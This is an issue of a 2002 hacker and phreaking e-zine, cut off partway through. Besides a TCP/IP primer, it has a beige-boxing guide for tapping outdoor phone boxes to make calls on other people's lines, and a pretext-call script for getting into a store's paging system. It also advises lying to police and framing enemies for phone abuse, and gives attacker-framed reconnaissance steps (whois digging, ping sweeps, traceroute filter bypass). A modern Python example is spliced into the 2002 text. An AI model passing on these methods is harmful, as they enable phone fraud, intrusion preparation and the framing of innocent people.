       |\_______________________________________________________________/|
       ||\_____________________________________________________________/||
       |||               __    ____                        __  __      |||
       |||              /\ \__/\  _`\  ---The E-Zine---   /\ \/\ \     |||
       |||   ___   __  _\ \ ,_\ \ \L\ \  _ __   __     __ \ \ \/'/'    |||
       |||  / __`\/\ \/\ \ \ \/\ \  _ <_/\`'__Y'__`\ /'__`\\ \ , <     |||
       ||| /\ \L\ \ \ \_\ \ \ \_\ \ \L\ \ \ \/\  __//\ \L\.\\ \ \\`\   |||
       ||| \ \____/\ \____/\ \__\\ \____/\ \_\ \____\ \__/.\_\ \_\ \_\ |||
       |||  \____/  \/___/  \/__/ \/___/  \/_/\/____/\/__/\/_/\/_/\/_/ |||
       |||_____________________________________________________________|||
       ||/_____________________________________________________________\||
       |/_______________________________________________________________\|
                                                                  `amatier


Outbreak Magazine Issue #4
April 2002 Release

     
      "Hey, this is Davies. Who just joined the conference?"

 				- Davies
     



     Editorial: 
      
     Welcome to Outbreak #4. I think it's a pretty good issue. A lot of
     people helped us out with this issue. And I thank you all.

     We are always looking for articles. So if you have something written
     and don't mind a bunch of people reading what you wrote, then send
     your text our way. The more texts the better. Send all articles to:
     kleptic@outbreakzine.net

     Check out our new website at:  http://www.outbreakzine.net

     Hope you all enjoy #4. Start sending your texts for #5.

     Enjoy!
     
	       - kleptic <kleptic@outbreakzine.net>         




         
     Staff:

               kleptic...............<kleptic@outbreakzine.net>
               fwaggle...............<root@fwaggle.net>
               `amatier..............<amatier@twcny.rr.com>
               antimatt3r............<antimatt3r@hotmail.com>
               Strykar...............<strykar@hackerzlair.org>
               Prodigal|Son..........<amlouden@insightbb.com>
               Ryan..................<ryan@insidergaming.net>
               Radioactive_Raindeer..<r_r@diegeekdie.org>
               timeless..............<timeless@timeless.co.zw>
               `Enigma...............<enigm4@freeshell.org>
               skwert................<skwert@cyberspace.org>
               dropcode..............<dropcode@outbreakzine.net>
               Meggito...............<meggito@hotmail.com>
               BadGadget.............<badgadget@molested.net>
               Turbanator............<turbanator2k2@roy.phonelosers.org>


		
		Shout Outs: 

		           All @ #hackerzlair on irc.dal.net,
                           RBCP at phonelosers.org, scene.textfiles.com, 
                           diegeekdie.org, hackerzlair.org, fwaggle.net, 
                           dsinet.org, ameriphreak.com, surviveall.net, 
                           roy.phonelosers.org, #outbreakzine on irc.dal.net,
                           Everyone that helped out with this issue of 
                           Outbreak. You all rule!

                                                                             
		               www.outbreakzine.net

		               Visit Us @ IRC.DAL.NET

		                Join #outbreakzine

		       Send all articles for submission to:

		              kleptic@outbreakzine.net


		


                              Outbreak Issue #4

         [ 0]   Editorial...............................kleptic
         [ 1]   TCP/IP part 3...........................antimatt3r
         [ 2]   The anTrojan Filez 3....................Timeless
         [ 3]   Beige Boxing............................antimatt3r
         [ 4]   Phreaking Do's and Dont's...............Turbanator
         [ 5]   Network Reconnaissance..................dropcode
         [ 6]   A Rant About "Try-Hard Punk Kids".......fwaggle
         [ 7]   Number Systems and Binary Math..........meggito
         [ 8]   nix console.............................amatier
         [ 9]   That's your real name!?.................BadGadget
         [10]   A Short Text On Web Browsers For Linux..Prodigal|Son
         [11]   It Doesn't Do What It Says On The Tin...Timeless
         [12]   Conclusion..............................kleptic



                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+


  All information provided in official OutBreak Zine Web sites is provided for
 information purposes only and does not constitute a legal contract between the
 Editors or Writers and any person or entity unless otherwise specified.
 Information on official OutBreak Zine web sites is subject to change without
 prior notice. Although every reasonable effort is made to present current and
 accurate information, the Editors and Writers make no guarantees of any kind.

  The OutBreak web site may contain information that is created and maintained
 by a variety of sources both internal and external to the Staff. These sites are
 unmoderated, containing the personal opinions and other expressions of the persons
 who post the entries. OutBreak does not control, monitor or guarantee
 the information contained in these sites or information contained in links to other
 external web sites, and does not endorse any views expressed or products or
 services offered therein. In no event shall OutBreak be responsible or
 liable, directly or indirectly, for any damage or loss caused or alleged to be
 caused by or in connection with the use of or reliance on any such content, goods,
 or services available on or through any such site or resource.

 Any links to external Web sites and/or non-OutBreak information provided on
 OutBreak pages or returned from any Web search engines are provided as a
 courtesy. They should not be construed as an endorsement by OutBreak
 of the content or views of the linked materials.


	COPYRIGHT AND LIMITATIONS ON USE:

 OutBreak contents may not be used without express written permission
 by the Editor: kleptic@outbreakzine.net

			COPYRIGHT © 2002.

                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 1 of 12


Hello folks this is TCP/IP part 3 by antimatt3r. ENJOY!

Client / server is defined by software, not hardware. The client application 
on one computer requests services from a computer running server software. 
Client / server software can run on any hardware.

   Server computers have a resource they share with other computers, or a 
service they can perform on behalf of other computers and users.  A web server 
sends files and images to a web browser (client). A web server on a private 
intranet is an internal information server. A commerce server lets you 
conduct business over the web. The server software includes security 
features such as Secure Sockets Layer (SSL). A file server shares its disk 
space with other computers. When there are multiple operating systems, there 
are various file formats. The server hides those format differences from the 
clients; software converts the format. This is called "transparent file 
access." A compute server is a computer that will run a program for you.

   A client is a computer that borrows a service or resource from another 
computer. A thin client is the smallest, lightest, and least expensive 
configuration of hardware and software configured to perform the exact tasks 
you need, nothing more, nothing else. Thin client means fat server. A 
browser receives information from a web server. Some smart cell phones are 
thin clients and have a microbrowser that knows how to display information 
on the phone screen.

   Most computers in a peer to peer network act as both clients and servers 
simultaneously. When browsing the web, the browser (client) pulls information 
down from the server. Server push technology is just the opposite - the 
server initiates the information delivery to the client. Delivery of E-mail 
is the most common push technology solution. Nowadays, content that is 
pushed is streaming audio and video.

The United States has 6 network access points:
New York - Operated by Pacific Bell
Bohemiany - Operated by ICS
Chicago - Operated by Ameritech
San Jose and MAE West - Operated by Worldcom
San Francisco - Operated by Pacific Bell

For maps of backbones visit http://www.nthelp.com/maps.htm

An intranet is a private network within an organization or department, a 
private version of the Internet. Extranets are multiple interconnected 
intranets and internets. For example, a university in the East may want to 
share information with a university in the West; they hook together with an 
extranet.

   So who is in charge of all of this you wonder? They say that no one 
controls TCP/IP but there are several organizations that influence TCP/IP 
and its direction, as well as Internet policies:

InterNIC: Internet Network Information Center keeps lists of domains.

IANA: Internet Assigned Numbers Authority is the central control for 
Internet addresses, domain names, and other protocol details. IANA maintains 
a database of top level domains for all countries.

ICANN: Internet Corporation for Assigned Names and Numbers Association was 
incorporated in the late 1990s and is taking over IANA's job.

IAB: Internet Activities Board defines architecture for the Internet 
backbone and all the networks that link to the backbone. The IAB oversees 
TCP/IP. They have a committee that works together to solve problems with 
Internet growth. They work with all the following committees to set 
the direction for research and the development of the Internet.

IETF: Internet Engineering Task Force is responsible for keeping the 
Internet running. 70 groups make up the IETF. The groups develop standards 
for TCP/IP. They manage the growth and change of TCP/IP and the Internet.

IESG: Internet Engineering Steering Group sets the strategic goals for the 
Internet. IAB appoints the chairperson and members. The IETF makes 
recommendations to the IESG about standardizing TCP/IP protocols for the 
Internet. The IESG manages how a protocol becomes an Internet standard. IESG 
oversees the IETF.

IRTF: Internet Research Task Force manages research into protocols. The IETF 
moves the IRTF's research into the practical world of TCP/IP and the 
Internet.

ISOC: IAB, IETF and IRTF are part of ISOC, which guides the future of the 
Internet. Members are people, companies, international and government 
organizations.

W3C: World Wide Web Consortium. The W3C decides on which standards to adopt 
for the Web and its protocols.

	The Internet is close to reaching the limits of its current address 
numbering system. Although estimates vary, the average figure for when we 
will run out of addresses is around 2010; that's not too far away.

	If the Internet is close to running out of addresses, that does not mean 
that soon it won't be able to accept new companies and individuals. The IESG 
created a task force to determine how to best enhance TCP/IP to cope with 
this problem. IPv6 to the rescue.

	IPv6 is the next generation of IP. It offers millions and millions more 
Internet addresses than we have now. Software vendors must develop products 
to cope with and understand the new addressing scheme. Some products are 
already in place. IPv6 also has some other "goodies" besides making 
addresses more abundant, like making it easier to assign addresses, 
increased cryptologic capabilities and advanced support for mobile devices.

	The current version of IP is IPv4. IPv5 was a research version that never 
made it to production.

	In order for IPv6 to provide more addresses, it needs to change the 
addressing format. It works like an area code to phone numbers. The IPv6 
task force mandates that old style IP addresses and new IPv6 addresses must 
coexist. The transition from version 4 to version 6 will be slow and 
gradual, over the next few years. We can also be sure that the Internet will 
understand both forms of IP addresses for years to come. Read RFC 1883 for 
additional information on IPv6.

	ISO: International Standards Organization specifies worldwide standards for 
different types of computing, sets standards for networking, database, and 
character sets, among other things.

	OSI: Open Systems Interconnect defines network architecture and a full set 
of protocols.

	OSI's interoperability standards have been designed to allow all parts of 
your network to work together. OSI divides network functions (for example, 
getting connected or sending mail) into layers and specifies how those 
layers interact.

	The ISO OSI seven layer stack:
Each layer provides services to the layer above it. In other words, each 
layer depends on the layer beneath it. When 2 peer computers are 
communicating, each PC has its own set of layers. When you send a message to 
another computer on the network, it starts at the top of the stack on your 
computer, travels down and jumps to the other computer. When the information 
gets to the other computer it starts at the bottom layer and works its way 
up the stack to the top, the application layer. LOWer layers are hardware 
oriented; HIGHer layers do things such as email and file transfers and are 
software related.

Layer 1 - The Physical Layer: This is the bottom of the stack, purely 
hardware, including the connection medium and the NIC.

Layer 2 - The Data Link Layer: Hardware involved, splits data into packets 
to be sent. When the information gets on the wire, the data link layer 
handles any interference.

Layer 3 - The Network Layer: Bottom layers are about hardware, TCP/IP is 
software. The network layer is the first place on the OSI model where a 
TCP/IP protocol fits in. IP works at this layer. This layer gets data from 
the data link layer (2) and sends it to the correct network address. If 
there is more than one possible path, the network layer figures out the best 
and fastest. Information would not get to the right place without this layer.

Layer 4 - The Transport Layer: The network layer takes your information to 
its destination, but can't guarantee that it will arrive in order or not pick 
up errors along the way. This is the transport layer's job. TCP and UDP are 
both at work here. Transport makes sure that all data arrives in order and 
is error free. Without this, you couldent tusrt ouyr 
neowtkr..............get it?

Layer 5 - The Session Layer: This layer establishes and coordinates a 
session, the connection. After the session is established, security is 
turned on.

Layer 6 - The Presentation Layer: Works with the filesystem and operating 
system. Files get converted from one type to another if the server & client 
use different formats. Without this, the file transfer would be limited to 
computers of the same file format.

Layer 7 - The Application Layer: This is the top layer where you do your 
work such as sending E-mail or requesting to transfer a file across the 
network. Without this layer, there is no way to create data to send, no 
browsers, and your computer wouldn't know what to do with information that 
is sent to you.

	TCP/IP's 5th layer is very rich: it combines the session, 
presentation, and application functions all in one layer. The third layer is 
the internet layer; this is the same as OSI's network layer. The following is 
the TCP/IP stack.

	-Application (RPC, SNMP, FTP, TFTP, DNS, DHCP, NFS, Telnet)
	-Transport  (TCP, UDP)
	-Internet  (IP, IPv6, ICMP, ARP, RARP)
	-Data link
	-Physical

	TCP/IP's modular, layered design makes it easy to innovate and add new 
components. If you envision a new network service, as you go about designing 
the server and client applications you can simultaneously design a new 
protocol to add to the TCP/IP suite. The protocol enables the server 
application to offer the service and lets the client application consume 
that service. This simplicity is a key advantage of TCP/IP.

	In the fabric of a network, you find a protocol/application/service 
relationship so tightly woven together that it may be difficult to 
distinguish the threads in the cloth. We shall use FTP as an example of 
this. FTP stands for file transfer protocol, but it's not only a protocol, 
it's also a service and an application. (don't worry about FTP if you don't 
know what it is)(then again if you don't, bin this text) FTP is a service for 
copying files; pull or push to a remote computer. Pull is a geek term for 
download, push means upload. FTP is also an application for copying files. 
You run client applications such as browsers to get files or upload, called 
FTPD, FTP daemon. FTP is a protocol because client and server use it for 
communication to ensure the information is bit for bit identical to the 
original. Without the application, a computer doesn't know what to copy. 
Without the service, there is no connection to the remote computer, and 
without the protocol computers can't communicate.
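
Added example, not part of the original article: the trip down the stack and back up that was described above, with an FTP control command as the application data. The addresses, MACs and port numbers are constructed sample values, and each receiving layer checks and strips only its own header.

```python
import socket
import struct

# Constructed sample values (documentation address ranges, made-up MACs).
SRC_MAC, DST_MAC = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
SRC_IP, DST_IP = "192.0.2.10", "198.51.100.21"
ETHERTYPE_IPV4, PROTO_TCP, MIN_ETH_PAYLOAD = 0x0800, 6, 46


def inet_checksum(data: bytes) -> int:
    """One's-complement checksum (RFC 1071) shared by IPv4 and TCP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def pseudo_header(src: bytes, dst: bytes, tcp_len: int) -> bytes:
    """TCP's checksum also covers the IP addresses, protocol and length."""
    return src + dst + struct.pack("!BBH", 0, PROTO_TCP, tcp_len)


def transport_wrap(data: bytes, sport: int, dport: int) -> bytes:
    """Transport layer: put a TCP header in front of the application data."""
    def header(csum: int) -> bytes:
        # seq=1, ack=0, header length 5 words, flags PSH|ACK, window 8192
        return struct.pack("!HHIIBBHHH", sport, dport, 1, 0,
                           5 << 4, 0x18, 8192, csum, 0)
    src, dst = socket.inet_aton(SRC_IP), socket.inet_aton(DST_IP)
    pseudo = pseudo_header(src, dst, 20 + len(data))
    return header(inet_checksum(pseudo + header(0) + data)) + data


def internet_wrap(segment: bytes) -> bytes:
    """Internet layer: put an IPv4 header in front of the TCP segment."""
    def header(csum: int) -> bytes:
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(segment), 0, 0,
                           64, PROTO_TCP, csum,
                           socket.inet_aton(SRC_IP), socket.inet_aton(DST_IP))
    return header(inet_checksum(header(0))) + segment


def datalink_wrap(packet: bytes) -> bytes:
    """Data link layer: Ethernet header; short payloads are padded to 46."""
    return (DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_IPV4)
            + packet.ljust(MIN_ETH_PAYLOAD, b"\x00"))


def send_down(data: bytes, sport: int = 49152, dport: int = 21) -> bytes:
    """Application data travels down: transport -> internet -> data link."""
    return datalink_wrap(internet_wrap(transport_wrap(data, sport, dport)))


def receive_up(frame: bytes) -> dict:
    """Walk back up; every layer validates its header before passing on."""
    if len(frame) < 14 + 20 + 20:
        raise ValueError("data link: frame too short")
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        raise ValueError("data link: not an IPv4 frame")
    packet = frame[14:]

    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    if packet[0] >> 4 != 4 or ihl < 20 or not ihl + 20 <= total_len <= len(packet):
        raise ValueError("internet: malformed IP header")
    if inet_checksum(packet[:ihl]) != 0:
        raise ValueError("internet: bad IP header checksum")
    if packet[9] != PROTO_TCP:
        raise ValueError("internet: payload is not TCP")
    src, dst = packet[12:16], packet[16:20]
    segment = packet[ihl:total_len]      # total_len drops Ethernet padding

    if inet_checksum(pseudo_header(src, dst, len(segment)) + segment) != 0:
        raise ValueError("transport: bad TCP checksum")
    sport, dport = struct.unpack("!HH", segment[:4])
    offset = (segment[12] >> 4) * 4
    if offset < 20 or offset > len(segment):
        raise ValueError("transport: malformed TCP header")
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "sport": sport, "dport": dport, "data": segment[offset:]}


if __name__ == "__main__":
    frame = send_down(b"PWD\r\n")        # constructed FTP control command
    print(len(frame), receive_up(frame))
```

A single flipped bit in the payload is rejected at the transport layer, and one in the IP header at the internet layer, which is the division of labour the layer descriptions give.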

to be continued in the next issue (as usual)  shoutz to #hackerzlair and all 
of our outstanding outbreak krew

                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 2 of 12

The anTrojan Filez 3
====================

The following may or may not be complete fiction. The previous sentence is here
to disable your ability to fully believe in the following material. If you did
manage to believe it fully, then the sentence would serve to stop you from
taking legal action against the author. Above all, it prepares you to be filled
with a sense of wonder at what you are about to read. Open your minds, we're
going in...

--------------------------------------------------------------------------------

"Future Spy - The Diary Revealed"


Foreword

Many people have risked their lives to obtain the following material. When you
read it you will probably begin to understand why it has been kept from public
knowledge. Imagine this power in the wrong hands. The following web page gave
these people enough information to start uncovering the mystery:
http://www.timeless.co.zw/futurespy.cfm


Onwards

Monday, February 12, 2001
I have lost my diary, so I went out and bought another today (you're reading it
now). It will probably turn up some day, I hope. If not, I think these memory
triggers will be all I need to remember what was in it: "dream diaries work!",
"when reaching for something touch it before touching it", "area of respect",
"desensitisation training to lose the ability to fear paranormal events". Today
I did some basic meditation to practice clearing my mind and then keeping it
clear for about 10 minutes each time. This will help stop my mind drifting at
the wrong time. Last time's experiences taught me a tough lesson. I am thinking
of doing two sessions per mission now just to check for consistencies.

Tuesday, February 13, 2001
Today I made a great deal of progress on the current mission. However, it's not
proving easy, especially as I don't fully understand the information given to
me yet. I see now that I am going to have to glean the information, then spend a
lot of time researching what we already know just so that I can get a general
understanding of what they're talking about. I have made notes on the session
but will go through them in more detail tomorrow.

Wednesday, February 14, 2001
The notes I made yesterday don't seem to give the full solution to the problem.
I still can't figure out what it means when they say "a free energy can at
giving back you kinetic negative value to b... (unclear letters follow)". I'm
getting so close now, I just know it.

Thursday, February 15, 2001
I think I probably need the rest of the information to be able to get this off
the ground. Words like "dimidemeiferous" mean nothing to me. It's going to be
hard to gather the required information to do the entire process of just making
that kind of metal. Once I know that then the rest might start making sense. My
head hurts!

Friday, February 16, 2001
There is so much to decipher, and it's difficult to tell which is relevant and
which is just chatter. I mean, "elephant can dig just as well as an eagle"???!
Huh? And then I got reprimanded for not being "jem" (spelling, hehe) clear.

Monday, February 19, 2001
Got an interesting message, "give I do free energy to give mankind a dose of
real need not greed". This was in reference to free energy being made freely
available when it is revealed, and that it should not be used for exploiting
others. We have to stop using fossil fuels, it can't go on like this.

Tuesday, February 20, 2001
I think someone stole my previous diary. I fear for my life, so I am going to
hide this one and stop writing and researching for a while. If only I could do
this kind of research under the protection of a greater power. I have my family
to think of. This will be my last entry.


The diary was "found" hidden in a sealed metal box in the loft. All other
documentation was not found or had been destroyed.

--------------------------------------------------------------------------------


And so it continues, as your mind gets infected by the anTrojan filez. Greetz to
all at #outbreakzine and #hackerzlair on DalNet.

- Timeless

                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 3 of 12


^^^^^^^^^^^^^^^^
Beige Boxing
By: antimatt3r
3/26/02
^^^^^^^^^^^^^^^

1.0  legal BS
1.1  intro / materials
1.2  fone jack beige
1.3  fone line coupler beige
1.4  prespliced wire beige (fast & easy)
1.5  what to do with your beige (for those who don't have the second material
     listed below.)
1.6  outro


1.0 The information in this text is not to be used in real life, and is 
intended only for educational uses. The writer or publisher of this paper is 
not responsible for the results of you the reader trying the actions 
described, or making the materials mentioned. (Don't do it and get caught 
then blame it on this text.... Just coverin my ass here.)

1.1 Intro/materials:
	This text will be geared for those who know what a beige box is and how it 
is to be used. Also, the reader must have a basic understanding of the hardware 
involved. What you need is the following:

	1 fone jack, or phone line coupler, or prespliced fone cord with screw 
terminals on the end. (those fancy half circle copper connectors.)

	1 brain of an 8 year old or older.

	2 alligator clips (ones with screw terminals are best, works well with the 
prespliced fone cord)

	Electrical tape (colors green and red for prettiness)

	an ANI and a CNA number will be helpful in your beiging experiences. 
(numbers are given below)

1.2 Method One (fone jack beige box):
	Take your fone jack apart and you need the green and red wires. Once you 
have the green and red wires you need to have them hanging out the box, once 
they are outside the box, close it back up. Hopefully the wires are 
prespliced and you won't need to splice the fone cord. If they aren't, 
obviously, you need to splice them. So once you have spliced green and red 
wires hanging out the box, wrap the wire around the screw on each of the 
alligator clips and tighten them nice and snug. You can wrap your alligator 
clip in electrical tape if you wish for insulation or color coding purposes. 
When you get shocked by a fone cable, about 5 minutes later your arms start 
to ache, and they hurt for about 2-4 hours. You now have a fone jack beige.

1.3 Method Two (fone line coupler beige box):
	This is a nice way to make a beige in that it is nice and easy and fairly 
quick. It is also small and durable. When you purchase your coupler make 
sure it is one that you can open up and then seal back together when done. 
Usually they have a crack going down the center where they can be split. 
Once you have your coupler open, you should have 2 plastic pieces connected 
by 4 wires; green, red, yellow, and black. What you want to do is grip the 
wire near the base of one side of the coupler and pull firmly to remove the 
wires from the second piece of plastic. What you should have now is one 
plastic piece with the 4 wires hanging out. The wires should be prespliced 
and have a copper wire on the end. Take the wires (green & red) and wrap 
them around the screws on the clips, tighten and you're good to go.

1.4 Method Three (an easy, small, durable, stealth, wonderful, cheap, and 
quick beige box)
	Go to ratshack and what you need is a fone cord that's about 6" long (the 
longer the better) that has the regular jack on one side to plug into the 
wall jack. (the clear plastic deal on the end of a cord) then on the other 
side instead of having another jack like normal, it has the 4 wires out, 
spliced, and with screw terminals on the ends of each. (the little half 
circle things to connect with a screw.) So take the red and green wires, put 
the connector on the screw, tighten, there ya go an easy, small, durable, 
stealth, wonderful, cheap and quick beige box.

1.5 What to do with your shiny beige box (for the Jr. Phreakettes)
	Go up to a TNI (Telefone Network Interface) or a can on the street and open 
it up, you will see red and green screws that should be colored red and 
green. If they are not colored, red is always on the right. Red=Right. put 
your clips on, plug the fone cord into the beige (from the fone) or just 
plug the cord into the fone for method 3. Dial your number you want to call. 
You can get the fone line number of the line you are calling by calling an 
ANI number. A few ANI numbers are: 800-444-3333, 800-444-4444 and 
800-555-1140 (little confusing to you 8 year olds)

holla!
shoutz to #hackerzlair and the entire outbreak crew
http://www.geocities.com/antimatt3r/




                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 4 of 12


Phreaking Do's and Dont's

By Turbanator (turbanator2k2@roy.phonelosers.org)



Here are some basic phreaking Do's and Dont's that every phreaker should know, at least in my opinion.

Don't phreak near Wal-Mart- There's way too many people around, especially when there's a sale, and you can get caught very easily.  I have seen this happen quite a few times to a kid who tried boxing with a CD player, man was that funny!

Do phreak Wal-Mart from home- How you ask?  Simple, call up your local Wal-Mart and ask to be transferred to some lame department, like housewares.  Then once the other department picks up, simply say that you're (insert bogus name here) from (insert department here) and you can't get on the paging system and if they could transfer you.  It should go something like this:

Them: Wal-Mart how may I help you?
You: Housewares please.
Them: One moment please.

Them: Housewares
You: Hi this is Tom from Electronics, I can't get into the paging system from this phone could you transfer me?
Them: Sure hold on.

Then bam, you're in their paging system and can say whatever you want, you can even call a Wal-Mart that's not local and mess with them.  Just don't be fuckin with em for too long and you should be fine.

Don't be a dumbass!- I don't know how many times I must stress this.  If a cop or another person asks you what you are doing while you're boxing in your tones, say something like "Oh I was playing this song to my friend but he hung up" or something along those lines.  That last quote works best if you're boxing using downloaded tones on an mp3 player or CD player.

Do be a smartass!- This is another important thing too.  If you're out phreaking and you notice someone is watching you, watch them. If they pull out a cell phone or go to a nearby payphone and start dialing then finish up whatever phreak you are doing and leave the area for a while, go get a big mac or something.  That way you can be sure that the person wasn't calling the cops on you or something.  I know I may sound paranoid, but when it comes to things like phreaking and sex, it's always best to be safe!

Don't get a total stranger in trouble- Unless they were a real asshole in the parking lot or in the movies don't go fuckin around with ops and saying all this shit only to let the next person who uses the phone to be taken away by the cops.  I know it sounds soo fucking funny but it's really not.

Do get your enemies in trouble- If you're bored and pissed at someone you really hate, why not do a little phreaking and make it seem like they did it.  Call up a 31337 BBS and act like a dumbass, during your acting try to get out the name of the person you really hate so that they get blamed for it and they might just get their phone fucked up, or worse.  Be careful though, as sometimes your enemy may be smart enough to trace the shit back to you, and that can be bad.


Well I hope this has helped at least someone.  Most of these Do's and Dont's I have personally experienced and know what it's like.  If you have any question I'm at turbanator2k2@roy.phonelosers.org or try to find me on DALnet in #outbreakzine

And don't come crying to me when you get busted, it's not my fault what you do with what I write.

                                +-+-+-+-+-+-+-+-+
                                |O|u|t|b|r|e|a|k|
                                +-+-+-+-+-+-+-+-+
                             Issue #4 - Page 5 of 12



###########################################
##...network reconnaissance. -dropcode...##
###########################################

"know thy enemy..." -sun tzu, the art of war.

-----------------------------------------------------------------------

:: introduction ::

network reconnaissance involves gathering information dealing with your
target's network. though often a grueling task, the information gleaned
with  the simple techniques i will explain throughout this article will
allow an attacker to build a complete dossier against a target network.

using  simple  recon techniques an attacker can systematically reduce a
network  from  a  mess  of  connected  machines  to a specific range of 
domains, network blocks and ip addresses.

-----------------------------------------------------------------------

:: public database digging ::

there  are  generally three areas of important info that can be gleaned
from  public  databases  related  to  the target's network:  registrar,
domain and network.

registrar  queries provide the attacker with specific whois / registrar
servers  directly  associated  with  the  target's  network.  this   is
important  because  these  associated servers are where the next queries
will be directed.

in  the  following  example,  i will be performing a registrar query on
psuedo  networks  inc.  from  a  bash shell.  of course, the crsnic.net 
server  could  be  queried  in  other  ways,  the bash shell was only a 
preference.

---
 $ whois "psuedo."@whois.crsnic.net
 
 psuedostuff.com
 psuedosomethin.com
 psuedo.net
 psuedopsuedo.org
--- 

placing the . wildcard at the end of my search string forced the server
to  return all occurrences of psuedo in the crsnic.net database. we can
now  dig  deeper to determine which domain is the one we want.  i would
guess that psuedo.net is our best chance.

---
  $ whois "psuedo.net"@whois.crsnic.net

  Domain Name: PSUEDO.NET
  Registrar: NETWORK SOLUTIONS, INC.
  Whois Server: whois.networksolutions.com
  Referral URL: www.networksolutions.com
  Name Server: DNS1.PSUEDO.NET
  Name Server: DNS2.PSUEDO.NET
---
  
blamo.  from  that  query we see that whois.networksolutions.com is the 
server we should direct our next queries at. 

the  domain  query  will  provide  us  with information relating to the
registrant,  the  domain  name, admin, when the record was last updated
and  the  primary  and  secondary  dns  servers (also acquired from the
first query).

---
  $ whois psuedo.net@whois.networksolutions.com
  
  [whois.networksolutions.com]
  Registrant:

  Psuedo Networks, Inc. (PSUEDO-DOM)
  123 nowhere ave.
  Buttfsck, AZ 12345

  Domain Name: PSUEDO.NET

  Administrative Contact, Technical Contact, Zone Contact:
  Rick, Slick [Network do0d] (SR924)  slickrick@PSUEDO.NET
  710-555-1234 (fax) 710-555-1235
  
  Record last updated on 30-Mar-02.
  Record created on 30-Mar-02.
  Database last updated on 10-Mar-02.

  Domain servers in listed order:
     DNS1.PSUEDO.NET	    10.10.10.1
     DNS2.PSUEDO.NET	    10.10.10.2
---

the word record refers to the information stored in the whois database.
if the record was created years ago and hasn't been updated, it's quite
possible  that  the  information in the record is out of date.  but  if
the update is recent we've acquired a wealth of information on our mark.

lastly, the network query. american registry of internet numbers [arin]
maintains  actual  network blocks and ownership information in a gorga-
massive database. we will use whois to query the arin database:

---
  $ whois "Psuedo Networks."@whois.arin.net
  [whois.arin.net]
  Psuedo Networks (NETBLK)	10.10.10.0 - 10.50.129.255
---
  
a  tighter  search  can  be made using a netblock as our search string.

---
  $ whois 10.10.10.0@whois.arin.net
  [whois.arin.net]
  Some Big Backbone (NETBLK NA-05BLK)	10.10.0.0 - 10.10.255.255
  Psuedo Networks (NETBLK NA-10-10-10-) 10.10.10.0 - 10.50.129.255
---

basically,  arin.net's  database  has given us a network block owned by 
psuedo  networks,  inc. thereby providing the attacker with a basic map 
of systems to target.

-----------------------------------------------------------------------

:: ping sweeping ::

ping  sweeping  is a very simple, but quite versatile technique used to 
determine  which  ip's  in  a  given  network  block  are actually live 
machines. 

the  basic  concept is to ping a range of ip's, compiling a list of the
ones  that  respond.  for  instance,  psuedo  networks  own  a  class c
netblock ranging from 10.10.10.0 to 10.50.129.255. at first glance this
seems likely to be a long grueling process, and often it is, especially
if  you're  mapping a larger class a type netblock. however, there is a
simple  technique  to quicken the process. there are a few programs out
that, instead of pinging each system one after another, send out all the
pings  at  once  and  idle  waiting for the replies. this speeds up the
process significantly.

generally,  pinging  a  host sends an icmp echo packet (icmp type 0x08)
and  waits  for an icmp echo_reply packet (icmp type 0x00). this method
is  sometimes  unreliable  due to the fact that access control devices
(acd's) are often configured to filter icmp packets. it is possible to
use a similar method, called the tcp ping, to see if a system is alive.
this method sends a tcp ack to the system and waits for an rst, showing
that the system is in fact alive.

gping/fping/hping are very handy *nix programs capable of ping sweeping
a network block. 

-----------------------------------------------------------------------

:: traceroute/tracert ::

using  traceroute  it  is  possible to find firewalls, packet filtering
devices and  other  access control devices [acd] on the target network.

---
  $ traceroute psuedo.net
  traceroute to psuedo.net (10.10.10.1), 30 hops max, 40 byte packets
  1 box1 (207.124.10.1) 5.133 ms 5.101 ms 5.111 ms
  2 rtr1.bigbackbone.net (10.10.22.10) 40.103 ms 40.210 ms 41.122 ms
  3 rtr2.bigbackbone.net (10.10.22.11) 43.123 ms 43.163 ms 43.211 ms
  4 acd.bigbackbone.net (10.10.11.11) 45.533 ms 45.364 ms 47.164 ms
  5 box.psuedo.net (10.10.10.1) 47.733 ms 47.103 ms 47.603 ms
---

generally,  it  is safe to assume that the last hop before an important
machine  on  the  target's  network is some form of acd on their isp's
network.  this acd can be anything from a physical hardware firewall to
a  simple  packet filtering device or router. in the above example, hop
four is likely an acd.

traceroute  generally uses udp packets by default, allowing the user to
switch  to  icmp  at  the  command line if they feel it necessary. (the
reverse  is  true  for  tracert  users.)  often  acd's will filter icmp
or udp packets and give you output such as:

---
  $ traceroute psuedo.net
  traceroute to psuedo.net (10.10.10.1), 30 hops max, 40 byte packets
  1  box1 (207.124.10.1) 5.133 ms 5.101 ms 5.111 ms
  2  rtr1.bigbackbone.net (10.10.22.10) 40.103 ms 40.210 ms 41.122 ms
  3  rtr2.bigbackbone.net (10.10.22.11) 43.123 ms 43.163 ms 43.211 ms
  4  acd.bigbackbone.net (10.10.11.11) 45.533 ms 45.364 ms 47.164 ms
  5  *   *   *
  6  *   *   *
---

it  is  possible  that switching the type of packets traceroute/tracert
sends  might bypass this form of acd filtering. also, it is possible to 
use  the  -p  switch to specify a starting udp port in conjunction with 
the  -S  switch to stop port incrementation. generally, traceroute will
start  at  the  port specified with -p and increment +1. with -S switch 
you can specify a port and keep all packets sending there. for instance
udp  port  53  handles  dns queries. since most acd's allow inbound dns
queries,  it's very likely that if you point your traceroute to 53, it
